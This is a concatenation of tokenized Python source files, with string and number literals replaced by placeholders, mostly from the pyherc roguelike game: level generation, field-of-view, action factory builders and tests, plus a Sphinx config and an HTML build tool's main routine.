( ) : <EOL> ( options , args , parser ) = simple_options ( _parser , __version__ , <EOL> __dependencies__ , input_required = False ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> input_files = args <EOL> if options . dump_default_template : <EOL> exit ( dump_default_template ( options . output ) ) <EOL> elif <NUM_LIT:0> == len ( args ) : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> parser . print_help ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> LOG . info ( "<STR_LIT>" , options ) <EOL> LOG . info ( "<STR_LIT>" , args ) <EOL> LOG . info ( "<STR_LIT>" , parser ) <EOL> LOG . info ( "<STR_LIT>" , options . templatedirs ) <EOL> if options . output is None : <EOL> LOG . error ( "<STR_LIT>" ) <EOL> parser . print_help ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> if options . mode not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> LOG . error ( '<STR_LIT>' , options . mode ) <EOL> parser . print_help ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> if options . mode in [ '<STR_LIT>' , '<STR_LIT>' ] and not options . dependency and not options . codefile : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> parser . print_usage ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> ( input_js , input_html ) = check_input ( input_files ) <EOL> LOG . info ( "<STR_LIT>" , input_js ) <EOL> LOG . info ( "<STR_LIT>" , input_html ) <EOL> if <NUM_LIT:0> == len ( input_js ) : <EOL> if options . mode in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> parser . print_usage ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> if <NUM_LIT:1> < len ( input_html ) : <EOL> LOG . error ( '<STR_LIT>' , input_html ) <EOL> exit ( <NUM_LIT:1> ) <EOL> env = env_create ( options , DEFAULT_HTML_TEMPLATE ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> retval = <NUM_LIT:1> <EOL> try : <EOL> if options . dependency : <EOL> LOG . info ( "<STR_LIT>" ) <EOL> retval = html_dump_dependencies ( env , options , input_js , input_html ) <EOL> LOG . info ( "<STR_LIT>" ) <EOL> else : <EOL> retval = html_generate ( env , options , input_js , input_html ) <EOL> except ToolsException , e : <EOL> LOG . error ( "<STR_LIT:%s>" , str ( e ) ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . dump_data ( ) <EOL> return retval <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> exit ( main ( ) ) </s>
<s> import sys , os , hy <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> from pyherc . version import PYHERC_VERSION <EOL> extensions = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = PYHERC_VERSION <EOL> release = PYHERC_VERSION <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from herculeum . ui . gui . character import CharacterWidget <EOL> from herculeum . ui . gui . inventory import InventoryWidget <EOL> from PyQt4 . QtGui import QDialog , QTabWidget , QVBoxLayout <EOL> class MenuDialog ( QDialog ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , surface_manager , character , action_factory , config , <EOL> parent , flags ) : <EOL> """<STR_LIT>""" <EOL> super ( MenuDialog , self ) . __init__ ( parent , flags ) <EOL> self . __set_layout ( surface_manager , <EOL> character , <EOL> action_factory , <EOL> config , <EOL> parent ) <EOL> def __set_layout ( self , surface_manager , character , action_factory , <EOL> config , parent ) : <EOL> """<STR_LIT>""" <EOL> self . keymap = self . _construct_keymap ( config ) <EOL> self . setWindowTitle ( '<STR_LIT>' ) <EOL> self . inventory = InventoryWidget ( surface_manager = surface_manager , <EOL> character = character , <EOL> action_factory = action_factory , <EOL> config = config , <EOL> parent = parent ) <EOL> self . character = CharacterWidget ( surface_manager = surface_manager , <EOL> character = character , <EOL> parent = parent ) <EOL> self . tabs = QTabWidget ( ) <EOL> self . tabs . addTab ( self . inventory , '<STR_LIT>' ) <EOL> self . tabs . addTab ( self . character , '<STR_LIT>' ) <EOL> layout = QVBoxLayout ( ) <EOL> layout . addWidget ( self . tabs ) <EOL> self . setLayout ( layout ) <EOL> self . inventory . items_carried . items [ <NUM_LIT:0> ] . setFocus ( ) <EOL> def _construct_keymap ( self , config ) : <EOL> """<STR_LIT>""" <EOL> keymap = { } <EOL> for key in config . left_shoulder : <EOL> keymap [ key ] = self . _switch_left <EOL> for key in config . right_shoulder : <EOL> keymap [ key ] = self . _switch_right <EOL> for key in config . start : <EOL> keymap [ key ] = self . _menu <EOL> return keymap <EOL> def _switch_left ( self ) : <EOL> """<STR_LIT>""" <EOL> current_tab = self . tabs . currentIndex ( ) <EOL> if current_tab > <NUM_LIT:0> : <EOL> self . tabs . setCurrentIndex ( current_tab - <NUM_LIT:1> ) <EOL> def _switch_right ( self ) : <EOL> """<STR_LIT>""" <EOL> current_tab = self . tabs . currentIndex ( ) <EOL> if current_tab < self . tabs . count ( ) : <EOL> self . tabs . setCurrentIndex ( current_tab + <NUM_LIT:1> ) <EOL> def _menu ( self ) : <EOL> """<STR_LIT>""" <EOL> self . done ( <NUM_LIT:0> ) <EOL> def keyPressEvent ( self , event ) : <EOL> """<STR_LIT>""" <EOL> key = event . key ( ) <EOL> if key in self . keymap : <EOL> self . keymap [ key ] ( ) <EOL> else : <EOL> super ( MenuDialog , self ) . keyPressEvent ( event ) </s>
<s> """<STR_LIT>""" <EOL> from . damage import DamageEffect <EOL> from . damagemodifier import DamageModifier <EOL> from . effectscollection import EffectsCollection <EOL> from . effect import Effect , EffectHandle <EOL> from . heal import Heal <EOL> from . movementmode import MovementModeModifier <EOL> from . poison import Poison </s>
<s> """<STR_LIT>""" <EOL> from pyherc . aspects import log_debug <EOL> from pyherc . generators . utils import BSPSection <EOL> from pyherc . generators . level . partitioners import ( section_width , section_height , <EOL> section_floor , section_wall ) <EOL> class CatacombsGenerator ( ) : <EOL> """<STR_LIT>""" <EOL> @ log_debug <EOL> def __init__ ( self , floor_tile , empty_tile , level_types , rng ) : <EOL> """<STR_LIT>""" <EOL> self . floor_tile = floor_tile <EOL> self . empty_tile = empty_tile <EOL> self . room_width = None <EOL> self . room_height = None <EOL> self . level_types = level_types <EOL> self . rng = rng <EOL> def __call__ ( self , section ) : <EOL> """<STR_LIT>""" <EOL> self . generate_room ( section ) <EOL> @ log_debug <EOL> def generate_room ( self , section ) : <EOL> """<STR_LIT>""" <EOL> level_size = ( section_width ( section ) , section_height ( section ) ) <EOL> room_min_size = ( <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> BSPStack = [ ] <EOL> BSP = BSPSection ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> ( level_size [ <NUM_LIT:0> ] - <NUM_LIT:2> , <EOL> level_size [ <NUM_LIT:1> ] - <NUM_LIT:2> ) , <EOL> None ) <EOL> BSPStack . append ( BSP ) <EOL> room_stack = [ ] <EOL> while len ( BSPStack ) > <NUM_LIT:0> : <EOL> tempBSP = BSPStack . pop ( ) <EOL> tempBSP . split ( min_size = ( room_min_size [ <NUM_LIT:0> ] + <NUM_LIT:4> , <EOL> room_min_size [ <NUM_LIT:1> ] + <NUM_LIT:4> ) ) <EOL> if tempBSP . node1 is not None : <EOL> BSPStack . append ( tempBSP . node1 ) <EOL> if tempBSP . node2 is not None : <EOL> BSPStack . append ( tempBSP . node2 ) <EOL> if tempBSP . node1 is None and tempBSP . node2 is None : <EOL> room_stack . append ( tempBSP ) <EOL> for room in room_stack : <EOL> corner1 = ( room . corner1 [ <NUM_LIT:0> ] + self . rng . randint ( <NUM_LIT:1> , <NUM_LIT:4> ) , <EOL> room . corner1 [ <NUM_LIT:1> ] + self . rng . randint ( <NUM_LIT:1> , <NUM_LIT:4> ) ) <EOL> corner2 = ( room . corner2 [ <NUM_LIT:0> ] - self . rng . randint ( <NUM_LIT:1> , <NUM_LIT:4> ) , <EOL> room . corner2 [ <NUM_LIT:1> ] - self . rng . randint ( <NUM_LIT:1> , <NUM_LIT:4> ) ) <EOL> for y in range ( corner1 [ <NUM_LIT:1> ] , corner2 [ <NUM_LIT:1> ] + <NUM_LIT:1> ) : <EOL> for x in range ( corner1 [ <NUM_LIT:0> ] , corner2 [ <NUM_LIT:0> ] + <NUM_LIT:1> ) : <EOL> section_floor ( section , <EOL> ( x , y ) , <EOL> self . floor_tile , <EOL> '<STR_LIT>' ) <EOL> section_wall ( section , <EOL> ( x , y ) , <EOL> self . empty_tile , <EOL> None ) <EOL> area_queue = BSP . get_area_queue ( ) <EOL> area_queue . reverse ( ) <EOL> while len ( area_queue ) > <NUM_LIT:1> : <EOL> area1 = area_queue . pop ( ) <EOL> area2 = area_queue . pop ( ) <EOL> center1 = area1 . get_center ( ) <EOL> center2 = area2 . get_center ( ) <EOL> if area1 . direction == <NUM_LIT:1> : <EOL> if center1 [ <NUM_LIT:1> ] < center2 [ <NUM_LIT:1> ] : <EOL> for y in range ( center1 [ <NUM_LIT:1> ] , center2 [ <NUM_LIT:1> ] + <NUM_LIT:1> ) : <EOL> section_floor ( section , <EOL> ( center1 [ <NUM_LIT:0> ] , y ) , <EOL> self . floor_tile , <EOL> '<STR_LIT>' ) <EOL> section_wall ( section , <EOL> ( center1 [ <NUM_LIT:0> ] , y ) , <EOL> self . empty_tile , <EOL> None ) <EOL> else : <EOL> for y in range ( center2 [ <NUM_LIT:1> ] , center1 [ <NUM_LIT:1> ] + <NUM_LIT:1> ) : <EOL> section_floor ( section , <EOL> ( center1 [ <NUM_LIT:0> ] , y ) , <EOL> self . floor_tile , <EOL> '<STR_LIT>' ) <EOL> section_wall ( section , <EOL> ( center1 [ <NUM_LIT:0> ] , y ) , <EOL> self . empty_tile , <EOL> None ) <EOL> else : <EOL> if center1 [ <NUM_LIT:0> ] < center2 [ <NUM_LIT:0> ] : <EOL> for x in range ( center1 [ <NUM_LIT:0> ] , center2 [ <NUM_LIT:0> ] + <NUM_LIT:1> ) : <EOL> section_floor ( section , <EOL> ( x , center1 [ <NUM_LIT:1> ] ) , <EOL> self . floor_tile , <EOL> '<STR_LIT>' ) <EOL> section_wall ( section , <EOL> ( x , center1 [ <NUM_LIT:1> ] ) , <EOL> self . empty_tile , <EOL> None ) <EOL> else : <EOL> for x in range ( center2 [ <NUM_LIT:0> ] , center1 [ <NUM_LIT:0> ] + <NUM_LIT:1> ) : <EOL> section_floor ( section , <EOL> ( x , center1 [ <NUM_LIT:1> ] ) , <EOL> self . floor_tile , <EOL> '<STR_LIT>' ) <EOL> section_wall ( section , <EOL> ( x , center1 [ <NUM_LIT:1> ] ) , <EOL> self . empty_tile , <EOL> None ) </s>
<s> """<STR_LIT>""" <EOL> from pyherc . data import level_size , blocks_los <EOL> mult = [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> ] ] <EOL> def cast_light ( cx , cy , row , start , end , radius , xx , xy , yx , yy , fov_matrix , <EOL> level ) : <EOL> """<STR_LIT>""" <EOL> if start < end : <EOL> return <EOL> radius_squared = radius * radius <EOL> for j in range ( row , radius + <NUM_LIT:1> ) : <EOL> dx , dy = - j - <NUM_LIT:1> , - j <EOL> blocked = False <EOL> while dx <= <NUM_LIT:0> : <EOL> dx += <NUM_LIT:1> <EOL> X , Y = cx + dx * xx + dy * xy , cy + dx * yx + dy * yy <EOL> l_slope , r_slope = ( dx - <NUM_LIT:0.5> ) / ( dy + <NUM_LIT:0.5> ) , ( dx + <NUM_LIT:0.5> ) / ( dy - <NUM_LIT:0.5> ) <EOL> if start < r_slope : <EOL> continue <EOL> elif end > l_slope : <EOL> break <EOL> else : <EOL> if dx * dx + dy * dy < radius_squared : <EOL> fov_matrix [ ( X , Y ) ] = True <EOL> if blocked : <EOL> if blocks_los ( level , ( X , Y ) ) : <EOL> new_start = r_slope <EOL> continue <EOL> else : <EOL> blocked = False <EOL> start = new_start <EOL> else : <EOL> if blocks_los ( level , ( X , Y ) ) and j < radius : <EOL> blocked = True <EOL> cast_light ( cx , cy , j + <NUM_LIT:1> , start , l_slope , <EOL> radius , xx , xy , yx , yy , fov_matrix , level ) <EOL> new_start = r_slope <EOL> if blocked : <EOL> break <EOL> return fov_matrix <EOL> def do_fov ( x , y , radius , fov_matrix , level ) : <EOL> """<STR_LIT>""" <EOL> for oct in range ( <NUM_LIT:8> ) : <EOL> cast_light ( x , y , <NUM_LIT:1> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , radius , <EOL> mult [ <NUM_LIT:0> ] [ oct ] , mult [ <NUM_LIT:1> ] [ oct ] , <EOL> mult [ <NUM_LIT:2> ] [ oct ] , mult [ <NUM_LIT:3> ] [ oct ] , fov_matrix , level ) <EOL> return fov_matrix <EOL> def get_fov_matrix ( location , level , distance ) : <EOL> """<STR_LIT>""" <EOL> fov_matrix = { } <EOL> fov_matrix [ location ] = True <EOL> return do_fov ( location [ <NUM_LIT:0> ] , <EOL> location [ <NUM_LIT:1> ] , distance , <EOL> fov_matrix , level ) </s>
<s> """<STR_LIT>""" <EOL> from pyherc . rules import Dying <EOL> from pyherc . rules . combat import RangedCombatFactory <EOL> from pyherc . rules . combat . factories import ( AttackFactory , MeleeCombatFactory , <EOL> UnarmedCombatFactory ) <EOL> from pyherc . rules . consume . factories import DrinkFactory <EOL> from pyherc . rules . digging . factories import DigFactory <EOL> from pyherc . rules . inventory . equip import EquipFactory <EOL> from pyherc . rules . inventory . factories import ( DropFactory , InventoryFactory , <EOL> PickUpFactory ) <EOL> from pyherc . rules . inventory . unequip import UnEquipFactory <EOL> from pyherc . rules . magic import GainDomainFactory , SpellCastingFactory <EOL> from pyherc . rules . mitosis . factory import MitosisFactory <EOL> from pyherc . rules . metamorphosis . factory import MetamorphosisFactory <EOL> from pyherc . rules . moving . factories import MoveFactory <EOL> from pyherc . rules . trapping . factory import TrappingFactory <EOL> from pyherc . rules . public import ActionFactory <EOL> from pyherc . rules . waiting . factories import WaitFactory <EOL> from random import Random <EOL> class ActionFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> self . model = None <EOL> self . factories = [ ] <EOL> self . dying_rules = Dying ( ) <EOL> self . effect_factory = None <EOL> self . use_real_attack_factory = False <EOL> self . use_real_drink_factory = False <EOL> self . use_real_inventory_factory = False <EOL> self . use_real_move_factory = False <EOL> self . use_real_spellcasting_factory = False <EOL> self . use_real_wait_factory = False <EOL> self . use_real_gain_domain_factory = False <EOL> self . use_real_dying_rules = False <EOL> self . use_real_mitosis_factory = False <EOL> self . use_real_metamorphosis_factory = False <EOL> self . use_real_dig_factory = False <EOL> self . use_real_trapping_factory = False <EOL> def with_move_factory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . use_real_move_factory = True <EOL> return self <EOL> def with_attack_factory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . use_real_attack_factory = True <EOL> return self <EOL> def with_drink_factory ( self , drink_factory = None ) : <EOL> """<STR_LIT>""" <EOL> if drink_factory is None : <EOL> self . use_real_drink_factory = True <EOL> else : <EOL> if hasattr ( drink_factory , '<STR_LIT>' ) : <EOL> self . factories . append ( drink_factory . build ( ) ) <EOL> else : <EOL> self . factories . append ( drink_factory ) <EOL> return self <EOL> def with_spellcasting_factory ( self , spellcasting_factory = None ) : <EOL> """<STR_LIT>""" <EOL> if not spellcasting_factory : <EOL> self . use_real_spellcasting_factory = True <EOL> else : <EOL> if hasattr ( spellcasting_factory , '<STR_LIT>' ) : <EOL> self . factories . append ( spellcasting_factory . build ( ) ) <EOL> else : <EOL> self . factories . append ( spellcasting_factory ) <EOL> return self <EOL> def with_wait_factory ( self , wait_factory = None ) : <EOL> """<STR_LIT>""" <EOL> if not wait_factory : <EOL> self . use_real_wait_factory = True <EOL> else : <EOL> if hasattr ( wait_factory , '<STR_LIT>' ) : <EOL> self . factories . append ( wait_factory . build ( ) ) <EOL> else : <EOL> self . factories . append ( wait_factory ) <EOL> return self <EOL> def with_inventory_factory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . use_real_inventory_factory = True <EOL> return self <EOL> def with_effect_factory ( self , effect_factory ) : <EOL> """<STR_LIT>""" <EOL> self . effect_factory = effect_factory <EOL> return self <EOL> def with_dying_rules ( self ) : <EOL> """<STR_LIT>""" <EOL> self . use_real_dying_rules = True <EOL> return self <EOL> def with_gain_domain_factory ( self , gain_domain_factory = None ) : <EOL> """<STR_LIT>""" <EOL> if gain_domain_factory : <EOL> self . factories . append ( gain_domain_factory ) <EOL> else : <EOL> self . use_real_gain_domain_factory = True <EOL> return self <EOL> def with_mitosis_factory ( self , mitosis_factory = None ) : <EOL> """<STR_LIT>""" <EOL> if mitosis_factory : <EOL> self . factories . append ( mitosis_factory ) <EOL> else : <EOL> self . use_real_mitosis_factory = True <EOL> return self <EOL> def with_metamorphosis_factory ( self , metamorphosis_factory = None ) : <EOL> """<STR_LIT>""" <EOL> if metamorphosis_factory : <EOL> self . factories . append ( metamorphosis_factory ) <EOL> else : <EOL> self . use_real_metamorphosis_factory = True <EOL> return self <EOL> def with_dig_factory ( self , dig_factory = None ) : <EOL> if dig_factory : <EOL> self . factories . append ( dig_factory ) <EOL> else : <EOL> self . use_real_dig_factory = True <EOL> return self <EOL> def with_trapping_factory ( self , trapping_factory = None ) : <EOL> if trapping_factory : <EOL> self . factories . append ( trapping_factory ) <EOL> else : <EOL> self . use_real_trapping_factory = True <EOL> return self <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . use_real_dying_rules : <EOL> self . dying_rules = Dying ( ) <EOL> if self . use_real_attack_factory : <EOL> unarmed_combat_factory = UnarmedCombatFactory ( self . effect_factory , <EOL> self . dying_rules ) <EOL> melee_combat_factory = MeleeCombatFactory ( self . effect_factory , <EOL> self . dying_rules ) <EOL> ranged_combat_factory = RangedCombatFactory ( self . effect_factory , <EOL> self . dying_rules ) <EOL> self . factories . append ( AttackFactory ( [ unarmed_combat_factory , <EOL> melee_combat_factory , <EOL> ranged_combat_factory ] ) ) <EOL> if self . use_real_drink_factory : <EOL> self . factories . append ( ( DrinkFactoryBuilder ( ) <EOL> . with_effect_factory ( self . effect_factory ) <EOL> . with_dying_rules ( self . dying_rules ) <EOL> . build ( ) ) ) <EOL> if self . use_real_inventory_factory : <EOL> self . factories . append ( InventoryFactory ( [ PickUpFactory ( ) , <EOL> DropFactory ( ) , <EOL> EquipFactory ( ) , <EOL> UnEquipFactory ( ) ] ) ) <EOL> if self . use_real_move_factory : <EOL> self . factories . append ( MoveFactory ( None , self . dying_rules ) ) <EOL> if self . use_real_spellcasting_factory : <EOL> self . factories . append ( SpellCastingFactoryBuilder ( ) . build ( ) ) <EOL> if self . use_real_wait_factory : <EOL> self . factories . append ( WaitFactoryBuilder ( ) . build ( ) ) <EOL> if self . use_real_gain_domain_factory : <EOL> self . factories . append ( GainDomainFactoryBuilder ( ) . build ( ) ) <EOL> if self . use_real_mitosis_factory : <EOL> self . factories . append ( MitosisFactoryBuilder ( ) <EOL> . with_dying_rules ( self . dying_rules ) <EOL> . build ( ) ) <EOL> if self . use_real_metamorphosis_factory : <EOL> self . factories . append ( MetamorphosisFactoryBuilder ( ) . build ( ) ) <EOL> if self . use_real_dig_factory : <EOL> self . factories . append ( DigFactoryBuilder ( ) . build ( ) ) <EOL> if self . use_real_trapping_factory : <EOL> self . factories . append ( TrappingFactoryBuilder ( ) . build ( ) ) <EOL> action_factory = ActionFactory ( self . model , <EOL> self . factories ) <EOL> return action_factory <EOL> class DrinkFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> self . effect_factory = None <EOL> self . dying_rules = Dying ( ) <EOL> self . use_real_dying_rules = False <EOL> def with_effect_factory ( self , effect_factory ) : <EOL> """<STR_LIT>""" <EOL> self . effect_factory = effect_factory <EOL> return self <EOL> def with_dying_rules ( self , dying_rules = None ) : <EOL> """<STR_LIT>""" <EOL> if dying_rules is not None : <EOL> self . dying_rules = dying_rules <EOL> else : <EOL> self . use_real_dying_rules = True <EOL> return self <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . use_real_dying_rules : <EOL> self . dying_rules = Dying ( ) <EOL> return DrinkFactory ( self . effect_factory , <EOL> self . dying_rules ) <EOL> class WaitFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> return WaitFactory ( ) <EOL> class GainDomainFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> return GainDomainFactory ( ) <EOL> class SpellCastingFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> self . spell_factory = None <EOL> self . use_real_spell_factory = False <EOL> self . effects_factory = None <EOL> self . use_real_effects_factory = False <EOL> def with_spell_factory ( self , spell_factory = None ) : <EOL> """<STR_LIT>""" <EOL> if not spell_factory : <EOL> self . use_real_spell_factory = True <EOL> else : <EOL> if hasattr ( spell_factory , '<STR_LIT>' ) : <EOL> self . spell_factory = spell_factory . build ( ) <EOL> else : <EOL> self . spell_factory = spell_factory <EOL> return self <EOL> def with_effects_factory ( self , effects_factory = None ) : <EOL> """<STR_LIT>""" <EOL> if effects_factory : <EOL> if hasattr ( effects_factory , '<STR_LIT>' ) : <EOL> self . effects_factory = effects_factory . build ( ) <EOL> else : <EOL> self . effects_factory = effects_factory <EOL> else : <EOL> self . use_real_effects_factory = True <EOL> return self <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . use_real_spell_factory : <EOL> pass <EOL> if self . use_real_effects_factory : <EOL> pass <EOL> return SpellCastingFactory ( spell_factory = self . spell_factory , <EOL> effects_factory = self . effects_factory , <EOL> dying_rules = Dying ( ) ) <EOL> class MitosisFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> self . character_generator = None <EOL> self . character_limit = <NUM_LIT:30> <EOL> self . rng = Random ( ) <EOL> self . dying_rules = Dying ( ) <EOL> self . use_real_dying_rules = False <EOL> def with_character_limit ( self , character_limit ) : <EOL> """<STR_LIT>""" <EOL> self . character_limit = character_limit <EOL> return self <EOL> def with_character_generator ( self , generator ) : <EOL> """<STR_LIT>""" <EOL> self . character_generator = generator <EOL> return self <EOL> def with_random_number_generator ( self , rng ) : <EOL> """<STR_LIT>""" <EOL> self . rng = rng <EOL> def with_dying_rules ( self , dying_rules = None ) : <EOL> """<STR_LIT>""" <EOL> if dying_rules : <EOL> self . dying_rules = dying_rules <EOL> else : <EOL> self . dying_rules = Dying ( ) <EOL> return self <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> return MitosisFactory ( character_generator = self . character_generator , <EOL> character_limit = self . character_limit , <EOL> rng = self . rng , <EOL> dying_rules = self . dying_rules ) <EOL> class MetamorphosisFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> self . character_generator = None <EOL> self . rng = Random ( ) <EOL> def with_character_generator ( self , generator ) : <EOL> """<STR_LIT>""" <EOL> self . character_generator = generator <EOL> return self <EOL> def with_random_number_generator ( self , rng ) : <EOL> """<STR_LIT>""" <EOL> self . rng = rng <EOL> return self <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> return MetamorphosisFactory ( character_generator = self . character_generator , <EOL> rng = self . rng ) <EOL> class DigFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> self . rng = Random ( ) <EOL> def with_random_number_generator ( rng ) : <EOL> """<STR_LIT>""" <EOL> self . rng = rng <EOL> return self <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> return DigFactory ( self . rng ) <EOL> class TrappingFactoryBuilder ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> self . trap_creator = None <EOL> def with_trap_creator ( self , trap_creator ) : <EOL> """<STR_LIT>""" <EOL> self . trap_creator = trap_creator <EOL> return self <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> return TrappingFactory ( self . trap_creator ) </s>
<s> """<STR_LIT>""" <EOL> from mockito . matchers import Matcher <EOL> from pyherc . events import e_event_type <EOL> class EventType ( Matcher ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( ) <EOL> self . event_type = type <EOL> def matches ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if not arg : <EOL> return False <EOL> return e_event_type ( arg ) == self . event_type <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . format ( self . event_type ) <EOL> def event_type_of ( event_type ) : <EOL> """<STR_LIT>""" <EOL> return EventType ( event_type ) </s>
<s> """<STR_LIT>""" <EOL> from hamcrest import assert_that <EOL> from mockito import mock , verify <EOL> from pyherc . data import Model <EOL> from pyherc . events import new_move_event <EOL> from pyherc . test . builders import CharacterBuilder , LevelBuilder <EOL> from pyherc . test . matchers import has_event_listener <EOL> class TestModel ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TestModel , self ) . __init__ ( ) <EOL> self . model = None <EOL> self . listener = None <EOL> self . level = None <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> self . model = Model ( ) <EOL> self . listener = mock ( ) <EOL> self . level = LevelBuilder ( ) . build ( ) <EOL> self . model . register_event_listener ( self . listener ) <EOL> def test_registering_event_listener ( self ) : <EOL> """<STR_LIT>""" <EOL> assert_that ( self . model , has_event_listener ( self . listener ) ) <EOL> def test_dispatching_event_to_listeners ( self ) : <EOL> """<STR_LIT>""" <EOL> event = new_move_event ( character = ( CharacterBuilder ( ) <EOL> . with_model ( self . model ) <EOL> . build ( ) ) , <EOL> old_location = ( <NUM_LIT:5> , <NUM_LIT:5> ) , <EOL> old_level = self . level , <EOL> direction = <NUM_LIT:1> ) <EOL> self . model . raise_event ( event ) <EOL> verify ( self . listener ) . receive_event ( event ) </s>
